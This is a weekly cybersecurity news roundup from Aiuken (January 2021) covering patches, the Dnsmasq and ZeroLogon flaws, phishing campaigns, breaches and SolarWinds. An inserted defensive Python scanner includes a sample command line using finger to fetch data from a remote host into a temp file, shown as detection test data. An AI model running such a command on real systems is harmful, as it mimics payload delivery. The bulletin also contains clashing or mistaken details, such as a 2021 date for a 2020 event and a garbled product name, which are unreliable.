Weekly cyber-facts in review 24/01/21 - Aiuken
Cisco
This week Cisco has released a batch of patches to address high-criticality vulnerabilities. These vulnerabilities affected SD-WAN, DNA Center and SSMS products, allowing code to be executed remotely on them, in some cases with administrator privileges. An attacker could take control of the affected products as a result. At the time this report is written, there is no notice of those vulnerabilities being exploited.

Siemens
Siemens has released a set of patches for both development tools (Siemens Digital Industries Software) and OT switches. 24 vulnerabilities affecting the development tools lead to memory corruption; they are triggered by uploading crafted files in 3D formats. OT switches from the SCALANCE X series are affected by two vulnerabilities allowing an attacker to position itself in the middle and receive all the traffic.

Oracle
The company has released 329 patches fixing several issues across 20 products. Oracle's Fusion Middleware is the product which received most attention, with 60 patches released for it. In second place, Financial Services Applications received 50. Other patched products were MySQL, Retail Applications, E-Business Suite, Oracle VM, Supply Chain Management, Communications, Enterprise Manager, PeopleSoft, Communications Applications, Database Server, Construction and Engineering, Hyperion, JD Edwards, Health Sciences Applications, Systems, Siebel CRM, Insurance Applications, GraalVM, Food and Beverage Applications, Java SE and Utilities Applications.

Apache
Projects which take the popular web server as their foundation received important patches this week. First, Apache Tomcat, an Apache version which offers better integration with Java, received a fix for a vulnerability which allows an attacker to retrieve forbidden resources when they are requested through the NTFS interface (NTFS is the way Microsoft organises files within persistent storage). The second fixed vulnerability affects Apache Vulnerability Tools (a set of tools for web editing). If exploited, an attacker could inject malicious code within the server.
Issues to keep in mind
Dnsmasq
Two sets of vulnerabilities were discovered in Dnsmasq. This software allows integrated and non-integrated DNS servers to save DNS requests and responses. DNS is the service which identifies a domain (example [.] com) with an IP (224 [.] 0 [.] 0 [.] 1), which at the end leads to a server. The first set of vulnerabilities would allow an attacker to modify the relationship between IPs and domain names. As a result, such an attacker would have the capability to redirect the traffic of a potential victim through a bad website, or a server with different services that use DNS requests. This is solved by enabling DNSSEC, a way to secure those records against tampering. However, the second set of vulnerabilities can be triggered once DNSSEC is enabled. An attacker could cause a buffer overflow (a technique to write in forbidden parts of the system memory with the hope of elevating privileges) with the aim of taking control of the device or taking it out of service. So far products from Cisco, Android, Aruba, Technicolor, Red Hat, Siemens, Ubiquiti Networks and Comcast have been identified as affected by the vulnerabilities.

ZeroLogon
At the end of the summer of 2020, a vulnerability allowing an attacker to take control of Domain Controllers (the servers which support the list of users and their privileges in Windows systems) was discovered. Such a vulnerability can be triggered by submitting a logon attempt with a concatenation of 0's in it. Microsoft released an initial patch allowing administrators to detect the vulnerability, but no definitive fix was released. Now, Microsoft warns that a second mitigation step is about to be released in February 2021. Systems are going to be required to establish a secure channel first before requesting authorization.
Phishing Campaigns in Review
FBI warns of employee credential phishing via telephone and company chat
The FBI has issued a Private Industry Notification (PIN) to warn of attacks targeting enterprises, in which threat actors attempt to obtain employee credentials through vishing or chat rooms. Threat actors search for an employee in the company's chat room and then try to convince them to log in to a fraudulent website in order to get their credentials.

Phishing campaign impersonating Ibercaja to steal credentials
A campaign of fraudulent emails impersonating Ibercaja has been detected, whose aim is to direct the victim to a fraudulent page to steal their login credentials and banking information.

Phishing campaign uses Finger command to distribute a backdoor
It has been identified that attackers are running a phishing campaign that uses the Windows Finger command to download and install the MineBridge backdoor on the victims' devices. This command allows a local user to retrieve a list of users on a remote machine, or information about a particular user.

Phishing campaign impersonating DGT to distribute malware
A phishing campaign has been detected in which attackers allegedly send a traffic fine by impersonating the DGT. The aim of this campaign is to distribute a type of Dropper malware designed to take control of the victim's computer.
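A defender-side illustration, added here and not part of the Aiuken bulletin: a small Python scanner that flags finger invocations in process-creation logs and scores them by whether the query targets a remote host (the user@host form used to fetch the lure's payload), whether the output is redirected or piped, and whether an Office application is the parent process. The log format, hosts and events are constructed for this example.

```python
import ntpath
import re
from collections import namedtuple

# Constructed sample process-creation events (not real telemetry): fixed-order
# key=value fields with a quoted command line; hosts use an RFC 5737 test range.
SAMPLE_EVENTS = r'''
ts=2021-01-20T10:14:02Z image=C:\Windows\System32\cmd.exe parent=C:\Program Files\Microsoft Office\WINWORD.EXE cmdline="cmd /c finger user@203.0.113.10 > %TEMP%\a.txt"
ts=2021-01-20T10:14:03Z image=C:\Windows\System32\finger.exe parent=C:\Windows\System32\cmd.exe cmdline="finger user@203.0.113.10"
ts=2021-01-20T10:20:11Z image=C:\Windows\System32\finger.exe parent=C:\Windows\System32\cmd.exe cmdline="finger"
ts=2021-01-20T10:25:40Z image=C:\Windows\System32\notepad.exe parent=C:\Windows\explorer.exe cmdline="notepad.exe notes.txt"
'''

Event = namedtuple('Event', 'ts image parent cmdline')
LINE_RE = re.compile(r'^ts=(\S+) image=(.+?) parent=(.+?) cmdline="(.*)"$')
# "finger" or "finger.exe" as a whole token anywhere in the command line.
FINGER_RE = re.compile(r'(?:^|[\\/\s"])finger(?:\.exe)?(?:\s|$)', re.IGNORECASE)
# user@host form: the query goes to a remote finger server, which is how the
# phishing lure fetches its payload; a bare "finger" only queries the local box.
REMOTE_RE = re.compile(r'@[\w.\-\[\]:]+')
OFFICE_PARENTS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'}


def parse_events(text):
    # Malformed lines are skipped rather than raising.
    return [Event(*m.groups()) for m in map(LINE_RE.match, text.strip().splitlines()) if m]


def classify(ev):
    # None when finger is not involved, otherwise the list of risk indicators.
    if not FINGER_RE.search(ev.cmdline):
        return None
    reasons = []
    if REMOTE_RE.search(ev.cmdline):
        reasons.append('remote finger query (user@host)')
    if re.search(r'[>|]', ev.cmdline):
        reasons.append('output redirected or piped')
    if ntpath.basename(ev.parent).lower() in OFFICE_PARENTS:
        reasons.append('spawned from an Office application')
    return reasons


def scan(text):
    # (timestamp, severity, reasons) for every finger invocation in the log.
    hits = []
    for ev in parse_events(text):
        reasons = classify(ev)
        if reasons is not None:
            severity = 'high' if len(reasons) >= 2 else 'medium' if reasons else 'low'
            hits.append((ev.ts, severity, reasons))
    return hits
```

Running `scan(SAMPLE_EVENTS)` rates the Word-spawned, redirected remote query high, the plain remote query medium and the local-only call low, while ignoring unrelated processes.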
Other cases: Code Leak, Malware, Skimmer, Infostealer

SAP
In September 2020, SAP released patches for vulnerability CVE-2020-6207, affecting SAP's Solution Manager. The vulnerability consists of a missing authorization check in its web interface, letting an attacker obtain administration privileges. Now, code to exploit such a vulnerability has been released, and scans to find potential victims exposing assets with the vulnerability have started.

Nitro PDF leaked customers
During the week a database of 14GB in length and containing more than 77 million customer records got published on the Dark Web. The database is (allegedly) said to be linked to the incident that the company reported on October 21st 2021. At that moment, the company denied any client leakage.

OpenWRT
The project that develops and supports an operating system for embedded devices now reports a data breach. A criminal got access on January 16th 2021 to an OpenWRT forum administrator account, having accessed emails, IDs and statistics among other details. The project now urges users to reset their passwords.

Russian hackers are using a new malware called Jupyter to steal information from their victims
The malware Jupyter, which is an infostealer, was first identified in October 2020, but its development began in May or even November 2019. This malware has been attributed to Russian hackers because most of its command and control servers are located there.
The Big Hack Blow: The Aftermath
At the end of the past year (2020) a hack of SolarWinds' infrastructure was discovered. The company develops and commercialises solutions to monitor the health of IT networks. The company was compromised in order to distribute malware to its customers via the Orion monitoring platform. It was a major blow for U.S. administrations (some of them handling very dangerous assets) and for companies like Microsoft, Cisco, VMware... Up to this point it is thought that two different APTs were involved in the attack against SolarWinds, and at least four ad-hoc malware families were discovered. As time passes, new victims are appearing. Last week Mimecast acknowledged having been affected by the hack, with the certificates used for encrypting communications between clients' (Microsoft 365) tenants and Mimecast's infrastructure compromised. Mimecast is a firm specialised in mail security and management, which means that with the compromise of its products, its clients could be facing a data breach right now. This week, a second company which sells cybersecurity products and services has acknowledged being affected too. Malwarebytes says that it was compromised through a mail security product embedded in its Microsoft 365 tenant (the name of the product was not reported). The company assures that the impact is limited to a small amount of emails. However, it is the third company selling cybersecurity products and services to be hit, along with the previously mentioned Mimecast and FireEye. The facts exposed above could be read in the sense that supply chain attacks are quite often overlooked. FireEye, the company that discovered the hack, found that the tool it trusted to monitor its infrastructure was compromised. Only then, with suspicion, did the companies which had also relied on the tool with little reserve (in the past) start to question what they have in their servers.
It is commonly observed that because of the idea of trust, and for fear of hurting feelings and appearances, people forget to check. But once the damage is done, feelings can do little to restore the lost secrets or the battered assets.
Calle Francisco Tomás y Valiente nº 2, Boadilla del Monte · 28660 Madrid (Spain). Telephone: +34 912 909 805. aiuken.com